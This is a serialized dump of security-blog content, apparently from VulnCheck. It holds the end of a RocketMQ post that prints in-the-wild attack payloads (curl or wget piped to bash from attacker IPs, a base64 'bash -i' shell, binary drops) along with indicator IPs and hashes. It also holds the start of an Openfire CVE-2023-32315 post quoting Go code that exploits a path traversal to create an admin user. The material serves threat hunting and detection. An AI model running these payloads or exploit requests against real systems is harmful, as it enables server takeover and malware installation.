,[1373,89543,15448],{"class":1397},[1373,89545,4713],{"class":1387},[1373,89547,89535],{"class":1391},[1373,89549,1388],{"class":1387},[1373,89551,11875],{"class":1383},[1373,89553,89554,89556,89558,89560,89562,89564,89566,89568],{"class":1375,"line":4798},[1373,89555,89427],{"class":4640},[1373,89557,5417],{"class":1397},[1373,89559,57298],{"class":9165},[1373,89561,59],{"class":1383},[1373,89563,89436],{"class":11735},[1373,89565,1384],{"class":1383},[1373,89567,11736],{"class":11735},[1373,89569,11875],{"class":1383},[18,89571,89572],{},"Based on that exploit, it seems likely that the type of attacker that would use that script would have no understanding of the underlying protocol that carries the payload into the configuration file. 
They wouldn't know anyone can download the configuration file and examine the payload.",[18,89574,89575,89576,89580,89581,89584,89585,89589],{},"Using our ",[47,89577,20558],{"href":89578,"rel":89579},"https:\u002F\u002Fpkg.go.dev\u002Fgithub.com\u002Fvulncheck-oss\u002Fgo-exploit",[51]," framework, we wrote a tool that will download RocketMQ broker configuration files and extract the vulnerable ",[886,89582,89583],{},"rocketmqHome"," variable. The tool is available on ",[47,89586,2485],{"href":89587,"rel":89588},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Ffetch-broker-conf",[51],", and it can be used to quickly hunt for exploited RocketMQ systems.",[18,89591,89592,89593,89596],{},"There are various ways to provide any go-exploit binary “targets”, but the easiest way to scan many hosts is by using the ",[886,89594,89595],{},"-rhosts-file"," option. The following is an example:",[1354,89598,89600],{"className":31740,"code":89599,"language":2186,"meta":219,"style":219},"albinolobster@mournland:~\u002Ffetch-broker-conf$ .\u002Fbuild\u002Fmain_linux-arm64 -a -e -rhosts-file \u002Ftmp\u002Frocketmq.csv -log-json true 2>\u002Fdev\u002Fnull | jq 'select(.msg == \"Extracted the variable\")'\n{\n  \"time\": \"2023-08-31T13:45:35.781849255-04:00\",\n  \"level\": \"SUCCESS\",\n  \"msg\": \"Extracted the variable\",\n  \"rocketmqHome\": \"-c $@|sh . echo (curl -s x.x.x.x\u002Frm.sh||wget -q -O- x.x.x.x\u002Frm.sh)|bash;\",\n  \"host\": \"x.x.x.x\",\n  \"port\": 10909\n}\n{\n  \"time\": \"2023-08-31T13:45:39.420484976-04:00\",\n  \"level\": \"SUCCESS\",\n  \"msg\": \"Extracted the variable\",\n  \"rocketmqHome\": \"-c $@|sh . 
echo (curl -s x.x.x.x\u002Frm.sh||wget -q -O- 45.15.158.124\u002Frm.sh)|bash;\",\n  \"host\": \"x.x.x.x\",\n  \"port\": 10909\n}\n",[886,89601,89602,89642,89646,89662,89677,89693,89714,89730,89740,89744,89748,89763,89777,89791,89810,89824,89832],{"__ignoreMap":219},[1373,89603,89604,89607,89610,89612,89614,89617,89620,89623,89625,89628,89630,89632,89635,89637,89640],{"class":1375,"line":1376},[1373,89605,89606],{"class":2206},"albinolobster@mournland:~\u002Ffetch-broker-conf$",[1373,89608,89609],{"class":1391}," .\u002Fbuild\u002Fmain_linux-arm64",[1373,89611,74504],{"class":2209},[1373,89613,38907],{"class":2209},[1373,89615,89616],{"class":2209}," -rhosts-file",[1373,89618,89619],{"class":1391}," \u002Ftmp\u002Frocketmq.csv",[1373,89621,89622],{"class":2209}," -log-json",[1373,89624,14986],{"class":7054},[1373,89626,89627],{"class":1397}," 2>",[1373,89629,8857],{"class":1391},[1373,89631,2233],{"class":1397},[1373,89633,89634],{"class":2206}," jq",[1373,89636,4713],{"class":1387},[1373,89638,89639],{"class":1391},"select(.msg == \"Extracted the variable\")",[1373,89641,76063],{"class":1387},[1373,89643,89644],{"class":1375,"line":220},[1373,89645,8904],{"class":1383},[1373,89647,89648,89651,89653,89655,89658,89660],{"class":1375,"line":1266},[1373,89649,89650],{"class":2206},"  \"time\"",[1373,89652,4606],{"class":1379},[1373,89654,4883],{"class":1387},[1373,89656,89657],{"class":1391},"2023-08-31T13:45:35.781849255-04:00",[1373,89659,183],{"class":1387},[1373,89661,9062],{"class":1391},[1373,89663,89664,89667,89669,89671,89673,89675],{"class":1375,"line":1852},[1373,89665,89666],{"class":2206},"  \"level\"",[1373,89668,4606],{"class":1379},[1373,89670,4883],{"class":1387},[1373,89672,39062],{"class":1391},[1373,89674,183],{"class":1387},[1373,89676,9062],{"class":1391},[1373,89678,89679,89682,89684,89686,89689,89691],{"class":1375,"line":4692},[1373,89680,89681],{"class":2206},"  
\"msg\"",[1373,89683,4606],{"class":1379},[1373,89685,4883],{"class":1387},[1373,89687,89688],{"class":1391},"Extracted the variable",[1373,89690,183],{"class":1387},[1373,89692,9062],{"class":1391},[1373,89694,89695,89698,89700,89702,89704,89707,89710,89712],{"class":1375,"line":4724},[1373,89696,89697],{"class":2206},"  \"rocketmqHome\"",[1373,89699,4606],{"class":1379},[1373,89701,4883],{"class":1387},[1373,89703,17976],{"class":1391},[1373,89705,25359],{"class":89706},"sVMSR",[1373,89708,89709],{"class":1391},"|sh . echo (curl -s x.x.x.x\u002Frm.sh||wget -q -O- x.x.x.x\u002Frm.sh)|bash;",[1373,89711,183],{"class":1387},[1373,89713,9062],{"class":1391},[1373,89715,89716,89719,89721,89723,89726,89728],{"class":1375,"line":4756},[1373,89717,89718],{"class":2206},"  \"host\"",[1373,89720,4606],{"class":1379},[1373,89722,4883],{"class":1387},[1373,89724,89725],{"class":1391},"x.x.x.x",[1373,89727,183],{"class":1387},[1373,89729,9062],{"class":1391},[1373,89731,89732,89735,89737],{"class":1375,"line":4768},[1373,89733,89734],{"class":2206},"  \"port\"",[1373,89736,4606],{"class":1379},[1373,89738,89739],{"class":5467}," 
10909\n",[1373,89741,89742],{"class":1375,"line":4792},[1373,89743,1855],{"class":1383},[1373,89745,89746],{"class":1375,"line":4798},[1373,89747,8904],{"class":1383},[1373,89749,89750,89752,89754,89756,89759,89761],{"class":1375,"line":4806},[1373,89751,89650],{"class":2206},[1373,89753,4606],{"class":1379},[1373,89755,4883],{"class":1387},[1373,89757,89758],{"class":1391},"2023-08-31T13:45:39.420484976-04:00",[1373,89760,183],{"class":1387},[1373,89762,9062],{"class":1391},[1373,89764,89765,89767,89769,89771,89773,89775],{"class":1375,"line":4817},[1373,89766,89666],{"class":2206},[1373,89768,4606],{"class":1379},[1373,89770,4883],{"class":1387},[1373,89772,39062],{"class":1391},[1373,89774,183],{"class":1387},[1373,89776,9062],{"class":1391},[1373,89778,89779,89781,89783,89785,89787,89789],{"class":1375,"line":4825},[1373,89780,89681],{"class":2206},[1373,89782,4606],{"class":1379},[1373,89784,4883],{"class":1387},[1373,89786,89688],{"class":1391},[1373,89788,183],{"class":1387},[1373,89790,9062],{"class":1391},[1373,89792,89793,89795,89797,89799,89801,89803,89806,89808],{"class":1375,"line":4835},[1373,89794,89697],{"class":2206},[1373,89796,4606],{"class":1379},[1373,89798,4883],{"class":1387},[1373,89800,17976],{"class":1391},[1373,89802,25359],{"class":89706},[1373,89804,89805],{"class":1391},"|sh . 
echo (curl -s x.x.x.x\u002Frm.sh||wget -q -O- 45.15.158.124\u002Frm.sh)|bash;",[1373,89807,183],{"class":1387},[1373,89809,9062],{"class":1391},[1373,89811,89812,89814,89816,89818,89820,89822],{"class":1375,"line":4843},[1373,89813,89718],{"class":2206},[1373,89815,4606],{"class":1379},[1373,89817,4883],{"class":1387},[1373,89819,89725],{"class":1391},[1373,89821,183],{"class":1387},[1373,89823,9062],{"class":1391},[1373,89825,89826,89828,89830],{"class":1375,"line":4849},[1373,89827,89734],{"class":2206},[1373,89829,4606],{"class":1379},[1373,89831,89739],{"class":5467},[1373,89833,89834],{"class":1375,"line":4877},[1373,89835,1855],{"class":1383},[18,89837,89838,89839,89841],{},"By scanning potentially affected systems, we found a variety of malicious payloads. It should be noted that it’s very straightforward for an attacker to overwrite their malicious ",[886,89840,89583],{}," with a benign value, so the attackers we caught aren’t the best out there. Regardless, the following is a small sampling of interesting payloads, associated addresses, and malware hashes.",[993,89843,89845],{"id":89844},"exploit-payloads","Exploit Payloads",[1354,89847,89850],{"className":89848,"code":89849,"language":1359},[1357],"\"rocketmqHome\": \"-c $@|sh . echo curl http:\u002F\u002Fx.x.x.x:8888\u002Fshc | tee \u002Ftmp\u002Fshc;\",\n\"rocketmqHome\": \"-c $@|sh . echo curl --output gr http:\u002F\u002Fx.x.x.x\u002Fbins\u002Fx86; chmod 777 *; .\u002Fgr apache.x86;\",\n\"rocketmqHome\": \"-c $@|sh . echo (curl -s x.x.x.x\u002Frm.sh||wget -q -O- x.x.x.x\u002Frm.sh)|bash;\",\n\"rocketmqHome\": \"-c $@|sh . echo echo \\\"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\\\"|base64 -d|bash -i;\",\n\"rocketmqHome\": \"-c $@|sh . 
echo reboot;\",\n",[886,89851,89849],{"__ignoreMap":219},[993,89853,89855],{"id":89854},"associated-attacker-ip-addresses","Associated Attacker IP Addresses",[1354,89857,89860],{"className":89858,"code":89859,"language":1359},[1357],"103.85.25.121\n94.156.6.110\n45.15.158.124\n134.209.58.230\nacf-producao.s3.amazonaws.com\nashleyhub.s3.amazonaws.com\naaadutyv1.s3.amazonaws.com\nbrazilfoundation-assets.s3.amazonaws.com\n",[886,89861,89859],{"__ignoreMap":219},[993,89863,89865],{"id":89864},"dropped-executable-hashes","Dropped Executable Hashes",[22,89867,89868,89875,89882,89889,89896],{},[25,89869,89870],{},[47,89871,89874],{"href":89872,"rel":89873},"https:\u002F\u002Fwww.virustotal.com\u002Fgui\u002Ffile\u002F1d489a41395be76a8101c2e1eba383253a291f4e84a9da389c6b58913786b8ac\u002Fdetection",[51],"1d489a41395be76a8101c2e1eba383253a291f4e84a9da389c6b58913786b8ac",[25,89876,89877],{},[47,89878,89881],{"href":89879,"rel":89880},"https:\u002F\u002Fwww.virustotal.com\u002Fgui\u002Ffile\u002Fd7843904e1c25055e14cae8b44b28f9dd4706c0ad8b03f55dfcded36ce8423a0\u002Fdetection",[51],"d7843904e1c25055e14cae8b44b28f9dd4706c0ad8b03f55dfcded36ce8423a0",[25,89883,89884],{},[47,89885,89888],{"href":89886,"rel":89887},"https:\u002F\u002Fwww.virustotal.com\u002Fgui\u002Ffile\u002F4feb3dcfe57e3b112568ddd1897b68aeb134ef8addd27b660530442ea1e49cbb\u002Fdetection",[51],"4feb3dcfe57e3b112568ddd1897b68aeb134ef8addd27b660530442ea1e49cbb",[25,89890,89891],{},[47,89892,89895],{"href":89893,"rel":89894},"https:\u002F\u002Fwww.virustotal.com\u002Fgui\u002Ffile\u002Ff93e9bc9583058d82d2d3fe35117cbb9a553d54e7149846b2dc94446f0836201\u002Fdetection",[51],"f93e9bc9583058d82d2d3fe35117cbb9a553d54e7149846b2dc94446f0836201",[25,89897,89898],{},[47,89899,89902],{"href":89900,"rel":89901},"https:\u002F\u002Fwww.virustotal.com\u002Fgui\u002Ffile\u002F49062378ab3e4a0d78c6db662efb4dbc680808fb75834b4674809bc8903adaea\u002Fdetection",[51],"49062378ab3e4a0d78c6db662efb4dbc680808fb75834b4674809bc8903adaea",[61,89904,1
903],{"id":1902},[18,89906,89907],{},"To our knowledge, CVE-2023-33246 is only associated with one botnet. However, it’s clear there are at least a few active actors, and even more victims. This is a good opportunity to remove your RocketMQ instance from the internet and to examine the broker configuration for signs of exploitation.",[61,89909,13102],{"id":13101},[18,89911,89912],{},"If you are as interested in exploits, attack surfaces, and vulnerabilities like we are then you might be interested in VulnCheck. Register for a VulnCheck account today by clicking \"Sign in \u002F Join Community\" and schedule a demo to learn more.",[2901,89914,89915],{},"html pre.shiki code .sRxSC, html code.shiki .sRxSC{--shiki-light:#39ADB5;--shiki-light-font-style:italic;--shiki-default:#D73A49;--shiki-default-font-style:inherit;--shiki-dark:#F97583;--shiki-dark-font-style:inherit;--shiki-sepia:#F92672;--shiki-sepia-font-style:inherit}html pre.shiki code .siCPE, html code.shiki .siCPE{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sLACW, html code.shiki .sLACW{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sGXK2, html code.shiki .sGXK2{--shiki-light:#39ADB5;--shiki-default:#D73A49;--shiki-dark:#F97583;--shiki-sepia:#F92672}html pre.shiki code .s91G_, html code.shiki .s91G_{--shiki-light:#90A4AE;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#F8F8F2}html pre.shiki code .swvn1, html code.shiki .swvn1{--shiki-light:#39ADB5;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .ss--_, html code.shiki .ss--_{--shiki-light:#90A4AE;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .squCx, html code.shiki .squCx{--shiki-light:#E53935;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .sYThS, html code.shiki 
.sYThS{--shiki-light:#F76D47;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .s_MOj, html code.shiki .s_MOj{--shiki-light:#E2931D;--shiki-light-font-style:inherit;--shiki-default:#005CC5;--shiki-default-font-style:inherit;--shiki-dark:#79B8FF;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .sAZ-3, html code.shiki .sAZ-3{--shiki-light:#6182B8;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .sMLJd, html code.shiki .sMLJd{--shiki-light:#6182B8;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#66D9EF}html .light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html.light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html 
.sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html.sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html pre.shiki code .sR7ES, html code.shiki .sR7ES{--shiki-light:#E2931D;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .sFhLe, html code.shiki .sFhLe{--shiki-light:#91B859;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sMTiH, html code.shiki .sMTiH{--shiki-light:#39ADB5;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sVMSR, html code.shiki .sVMSR{--shiki-light:#90A4AE;--shiki-light-font-style:italic;--shiki-default:#005CC5;--shiki-default-font-style:inherit;--shiki-dark:#79B8FF;--shiki-dark-font-style:inherit;--shiki-sepia:#FD971F;--shiki-sepia-font-style:italic}",{"title":219,"searchDepth":220,"depth":220,"links":89917},[89918,89919,89920,89921,89922],{"id":89844,"depth":1266,"text":89845},{"id":89854,"depth":1266,"text":89855},{"id":89864,"depth":1266,"text":89865},{"id":1902,"depth":220,"text":1903},{"id":13101,"depth":220,"text":13102},"2023-09-05","VulnCheck demonstrates the use of the RocketMQ remoting protocol to retrieve the broker configuration file, and shares attacker payloads used in the wild for exploitation with 
CVE-2023-33246.",{"slug":89926},"rocketmq-exploit-payloads","\u002Fblog\u002Frocketmq-exploit-payloads",{"title":83500,"description":89924},"blog\u002Frocketmq-exploit-payloads",[242,23275],"KRGsp_nF1CgZBhKqiBaNb6kW0YgkjcgDbB4JQ_MhI1U",{"id":89933,"title":83439,"articles":89934,"authors":89984,"body":89986,"date":89938,"description":91851,"extension":234,"image":7,"link":7,"meta":91852,"navigation":237,"path":91854,"seo":91855,"series":7,"stem":91856,"subtype":7,"tags":91857,"__hash__":91858},"blog\u002Fblog\u002Fopenfire-cve-2023-32315.md",[89935,89939,89943,89946,89949,89953,89954,89957,89960,89964,89968,89972,89976,89980],{"title":89936,"source":39566,"link":89937,"date":89938},"Cyberespionage, attributed and unattributed. Election interference in Ecuador. Carderbee hits Hong Kong. No breach at auDA. Hacktivism in the hybrid war.","https:\u002F\u002Fthecyberwire.com\u002Fnewsletters\u002Fdaily-briefing\u002F12\u002F160","2023-08-22",{"title":89940,"source":14373,"link":89941,"date":89942},"Over 3,000 Openfire servers vulnerable to takover attacks","https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fover-3-000-openfire-servers-vulnerable-to-takover-attacks\u002F","2023-08-23",{"title":89944,"source":3494,"link":89945,"date":89942},"Risky Biz News: South Korea is investigating \"spy chip\" in Chinese weather measuring equipment","https:\u002F\u002Friskybiznews.substack.com\u002Fp\u002Fsouth-korea-is-investigating-chinese-spy-chip",{"title":89947,"source":14378,"link":89948,"date":89942},"3,000 Openfire Servers Exposed to Attacks Targeting Recent Vulnerability","https:\u002F\u002Fwww.securityweek.com\u002F3000-openfire-servers-exposed-to-attacks-targeting-recent-vulnerability\u002F",{"title":89950,"source":61450,"link":89951,"date":89952},"Recent Vulnerability Puts 3,000 Openfire Servers at Risk of 
Attack","https:\u002F\u002Fwww.cysecurity.news\u002F2023\u002F08\u002Frecent-vulnerability-puts-3000-openfire.html","2023-08-24",{"title":89950,"source":11233,"link":89951,"date":89952},{"title":89955,"source":14390,"link":89956,"date":89952},"Researchers warn that more than 3,000 unpatched Openfire servers are exposed to attacks using an exploit for a recent flaw.","https:\u002F\u002Fsecurityaffairs.com\u002F149811\u002Fbreaking-news\u002Fopenfire-servers-exposed-new-exploit.html",{"title":89958,"source":14382,"link":89959,"date":89952},"Thousands of Unpatched Openfire XMPP Servers Still Exposed to High-Severity Flaw","https:\u002F\u002Fthehackernews.com\u002F2023\u002F08\u002Fthousands-of-unpatched-openfire-xmpp.html",{"title":89961,"source":73072,"link":89962,"date":89963},"Cyber Security Headlines: Lazarus exploits ManageEngine, Rockwell ThinManager vulnerabilities, Mississippi hospital attack","https:\u002F\u002Fcisoseries.com\u002Fcyber-security-headlines-lazarus-exploits-manageengine-rockwell-thinmanager-vulnerabilities-mississippi-hospital-attack\u002F","2023-08-25",{"title":89965,"source":89966,"link":89967,"date":89963},"Cyber Security Today, Week in Review for the week ending Friday, August 25, 2023","IT World Canada’s Cyber Security Today podcast","https:\u002F\u002Fwww.itworldcanada.com\u002Farticle\u002Fcyber-security-today-week-in-review-for-the-week-ending-friday-august-25-2023\u002F545341",{"title":89969,"source":74108,"link":89970,"date":89971},"Weekly Vulnerability Recap – August 28, 2023 – Windows, Ivanti, Adobe Hit By Flaws","https:\u002F\u002Fwww.esecurityplanet.com\u002Ftrends\u002Fweekly-vulnerability-recap-august-28-2023-windows-ivanti-adobe-hit-by-flaws\u002F","2023-08-28",{"title":89973,"source":89974,"link":89975,"date":89971},"GO CRYPTO IN PRACTICE, EXCEL EXECUTES PYTHON, PROTECTING USERS, DARPA DISTILLS – ASW #253","SC Media's Application Security Weekly 
podcast","https:\u002F\u002Fwww.scmagazine.com\u002Fpodcast-segment\u002Fgo-crypto-in-practice-excel-executes-python-protecting-users-darpa-distills-asw-253",{"title":89977,"source":14373,"link":89978,"date":89979},"Hackers actively exploiting Openfire flaw to encrypt servers","https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fhackers-actively-exploiting-openfire-flaw-to-encrypt-servers\u002F","2023-09-26",{"title":89981,"source":65365,"link":89982,"date":89983},"China-linked hackers target governments and more in Southeast Asia with new backdoors","https:\u002F\u002Ftherecord.media\u002Fearth-krahang-china-linked-espionage-group-new-backdoors","2024-03-19",[89985],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":89987,"toc":91843},[89988,89990,90014,90029,90037,90040,90043,90045,90067,90073,90076,90081,90085,90088,90091,90095,90108,90466,90472,90478,90481,90487,90490,90493,90502,90511,90517,90539,91198,91205,91223,91230,91236,91239,91246,91255,91262,91265,91278,91454,91457,91539,91545,91551,91554,91560,91563,91566,91764,91767,91770,91773,91780,91786,91797,91803,91809,91812,91819,91824,91826,91832,91835,91837,91840],[61,89989,11648],{"id":11647},[18,89991,89992,89997,89998,90003,90004,10515,90008,90013],{},[47,89993,89996],{"href":89994,"rel":89995},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2023-32315",[51],"CVE-2023-32315"," is a path traversal vulnerability affecting the ",[47,89999,90002],{"href":90000,"rel":90001},"https:\u002F\u002Fwww.igniterealtime.org\u002Fprojects\u002Fopenfire\u002F",[51],"Openfire"," admin console. 
Openfire is a ",[47,90005,30087],{"href":90006,"rel":90007},"https:\u002F\u002Fen.wikipedia.org\u002Fwiki\u002FOpenfire",[51],[47,90009,90012],{"href":90010,"rel":90011},"https:\u002F\u002Fgithub.com\u002Figniterealtime\u002FOpenfire",[51],"open-source"," chat server, and according to the current maintainers, Ignite Realtime, the server software has been downloaded almost 9 million times.",[18,90015,90016,90017,90022,90023,90028],{},"This vulnerability has flown under the radar on the defensive side of the industry. CVE-2023-32315 has been ",[47,90018,90021],{"href":90019,"rel":90020},"https:\u002F\u002Fwww.surevine.com\u002Fopenfire-cve-2023-32315-what-we-know\u002F",[51],"exploited in the wild",", but you won’t find it in the CISA KEV catalog. There has also been minimal discussion about indicators of compromise and very few detections (although to their credit, Ignite Realtime put out ",[47,90024,90027],{"href":90025,"rel":90026},"https:\u002F\u002Fgithub.com\u002Figniterealtime\u002FOpenfire\u002Fsecurity\u002Fadvisories\u002FGHSA-gw42-f939-fhvm",[51],"patches"," and a great mitigation guide back in May).",[18,90030,90031,90032,90036],{},"On the offensive side, things have been more robust. You can find quite a few public exploits. There are some major differences between these exploits, but generally, they all follow a simple pattern: Use the path traversal to create an administrative user, log in, and then upload a plugin to achieve code execution. This process is typically manual, although ",[47,90033,36852],{"href":90034,"rel":90035},"https:\u002F\u002Fraw.githubusercontent.com\u002Frapid7\u002Fmetasploit-framework\u002Fmaster\u002Fmodules\u002Fexploits\u002Fmulti\u002Fhttp\u002Fopenfire_auth_bypass_rce_cve_2023_32315.rb",[51]," uploads the plugin programmatically).",[18,90038,90039],{},"What’s particularly interesting about this is that creating the administrative user isn’t necessary, but it’s re-implemented over and over again. 
Worse, not only is it not required, but it significantly increases the amount of logging the attacker introduces.",[18,90041,90042],{},"In this blog, we’ll demonstrate an improved exploit for CVE-2023-32315, learn how to craft an Openfire plugin webshell, examine indicators of compromise, and share network detections.",[61,90044,88415],{"id":88414},[18,90046,90047,90048,90052,90053,10515,90058,90062,90063,90066],{},"To start, we want to establish that this vulnerability is still prevalent in the wild. At the time of writing, we see approximately 6,300 servers on ",[47,90049,41731],{"href":90050,"rel":90051},"https:\u002F\u002Fwww.shodan.io\u002Fsearch?query=html%3A%22jive-loginVersion%22",[51],". Censys shows a ",[47,90054,90057],{"href":90055,"rel":90056},"https:\u002F\u002Fsearch.censys.io\u002Fsearch?resource=hosts&sort=RELEVANCE&per_page=25&virtual_hosts=INCLUDE&q=services.http.response.body_hash%3D%22sha1%3Ac44f746e0ba05d036d47e56afb7981d8bdf0a366%22",[51],"bit",[47,90059,81313],{"href":90060,"rel":90061},"https:\u002F\u002Fsearch.censys.io\u002Fsearch?resource=hosts&sort=RELEVANCE&per_page=25&virtual_hosts=INCLUDE&q=services.http.response.favicons.md5_hash%3D%22e4888ee8491b4eb75501996e41af6460%22",[51],", but it doesn’t follow the redirect to ",[886,90064,90065],{},"login.jsp"," making the queries a little more dicey.",[18,90068,90069],{},[68,90070],{":width":10862,"alt":90071,"src":90072},"Openfire instances on Shodan","\u002Fblog\u002Fopenfire-cve-2023-32315\u002Fshodan-openfire.png",[18,90074,90075],{},"Openfire exposes the installed version on the login page. To determine just how widely exploitable this vulnerability is, we did a version scan of the servers on Shodan. Openfire put out three patched versions: 4.6.8, 4.7.5, and 4.8.0. 
Approximately 20% of the servers had upgraded to those versions.",[1925,90077,90078],{},[18,90079,90080],{},"Openfire Versions Indexed by Shodan",[78559,90082],{":labels":90083,":values":90084},"[\"Patched\",\"Too Old\",\"Forks\",\"Affected\"]","[20,25,5,50]",[18,90086,90087],{},"This doesn’t mean the remaining 80% are using affected versions. Openfire says the first affected version is 3.10.0, released in April 2015. Any version released before then is not vulnerable, and these older versions make up nearly 25% of the internet-facing Openfire servers. Of those, the most popular version is 3.7.1, released in 2011. You could assume those are mostly honeypots, but we can’t be sure.",[18,90089,90090],{},"We found there are a variety of Openfire forks that may or may not be vulnerable, making up about 5% of the internet-facing servers. This leaves approximately 50% of the internet-facing Openfire servers using affected versions. While that’s only a few thousand servers, it’s a decent number given the server’s trusted position associated with chat clients.",[61,90092,90094],{"id":90093},"impacts-of-a-user-less-exploit","Impacts of a User-less Exploit",[18,90096,90097,90098,90101,90102,90107],{},"Current public exploits start by using the traversal to reach ",[886,90099,90100],{},"user-create.jsp"," to create an administrative user. There are quite a few exploits at this point, but as far as I can tell, the first public exploit to establish an admin user was published on June 14 as ",[47,90103,90106],{"href":90104,"rel":90105},"https:\u002F\u002Fgithub.com\u002Ftangxiaofeng7\u002FCVE-2023-32315-Openfire-Bypass",[51],"tangxiaofeng7\u002FCVE-2023-32315-Openfire-Bypass"," on GitHub (at least five days after the first in-the-wild exploitation). 
Written in Go, the admin creation looks like this:",[1354,90109,90111],{"className":19022,"code":90110,"language":19024,"meta":219,"style":219},"username := generateRandomString(6)\npassword := generateRandomString(6)\n\ncreateUserUrl := fmt.Sprintf(\"%s\u002Fsetup\u002Fsetup-s\u002F%%u002e%%u002e\u002F%%u002e%%u002e\u002Fuser-create.jsp?csrf=%s&username=%s&name=&email=&password=%s&passwordConfirm=%s&isadmin=on&create=%%E5%%88%%9B%%E5%%BB%%BA%%E7%%94%%A8%%E6%%88%%B7\", t, csrf, username, password, password)\nres, err = rawhttp.Get(createUserUrl)\n\nm := map[string][]string{\"Cookie\": {\"JSESSIONID=\" + jsessionid, \"csrf=\" + csrf}}\n\nres, err = rawhttp.DoRaw(\"GET\", createUserUrl, \"\", m, nil)\nif err != nil {\n fmt.Println(err)\n return\n}\n",[886,90112,90113,90129,90144,90148,90295,90320,90324,90382,90386,90431,90443,90457,90462],{"__ignoreMap":219},[1373,90114,90115,90118,90120,90123,90125,90127],{"class":1375,"line":1376},[1373,90116,90117],{"class":4640},"username ",[1373,90119,20584],{"class":1397},[1373,90121,90122],{"class":7297}," generateRandomString",[1373,90124,1384],{"class":1383},[1373,90126,356],{"class":5467},[1373,90128,11875],{"class":1383},[1373,90130,90131,90134,90136,90138,90140,90142],{"class":1375,"line":220},[1373,90132,90133],{"class":4640},"password 
",[1373,90135,20584],{"class":1397},[1373,90137,90122],{"class":7297},[1373,90139,1384],{"class":1383},[1373,90141,356],{"class":5467},[1373,90143,11875],{"class":1383},[1373,90145,90146],{"class":1375,"line":1266},[1373,90147,6520],{"emptyLinePlaceholder":237},[1373,90149,90150,90153,90155,90157,90159,90161,90163,90165,90167,90170,90173,90176,90178,90181,90183,90185,90187,90190,90192,90195,90197,90200,90202,90205,90207,90210,90212,90215,90217,90220,90222,90225,90227,90229,90231,90234,90236,90239,90241,90244,90246,90248,90250,90253,90255,90258,90260,90262,90264,90267,90269,90271,90274,90276,90279,90281,90284,90286,90289,90291,90293],{"class":1375,"line":1852},[1373,90151,90152],{"class":4640},"createUserUrl ",[1373,90154,20584],{"class":1397},[1373,90156,82848],{"class":4640},[1373,90158,59],{"class":1383},[1373,90160,82853],{"class":7297},[1373,90162,1384],{"class":1383},[1373,90164,183],{"class":1387},[1373,90166,38048],{"class":37971},[1373,90168,90169],{"class":1391},"\u002Fsetup\u002Fsetup-s\u002F",[1373,90171,90172],{"class":37971},"%%",[1373,90174,90175],{"class":1391},"u002e",[1373,90177,90172],{"class":37971},[1373,90179,90180],{"class":1391},"u002e\u002F",[1373,90182,90172],{"class":37971},[1373,90184,90175],{"class":1391},[1373,90186,90172],{"class":37971},[1373,90188,90189],{"class":1391},"u002e\u002Fuser-create.jsp?csrf=",[1373,90191,38048],{"class":37971},[1373,90193,90194],{"class":1391},"&username=",[1373,90196,38048],{"class":37971},[1373,90198,90199],{"class":1391},"&name=&email=&password=",[1373,90201,38048],{"class":37971},[1373,90203,90204],{"class":1391},"&passwordConfirm=",[1373,90206,38048],{"class":37971},[1373,90208,90209],{"class":1391},"&isadmin=on&create=",[1373,90211,90172],{"class":37971},[1373,90213,90214],{"class":1391},"E5",[1373,90216,90172],{"class":37971},[1373,90218,90219],{"class":1391},"88",[1373,90221,90172],{"class":37971},[1373,90223,90224],{"class":1391},"9B",[1373,90226,90172],{"class":37971},[1373,90228,90214],{"class":1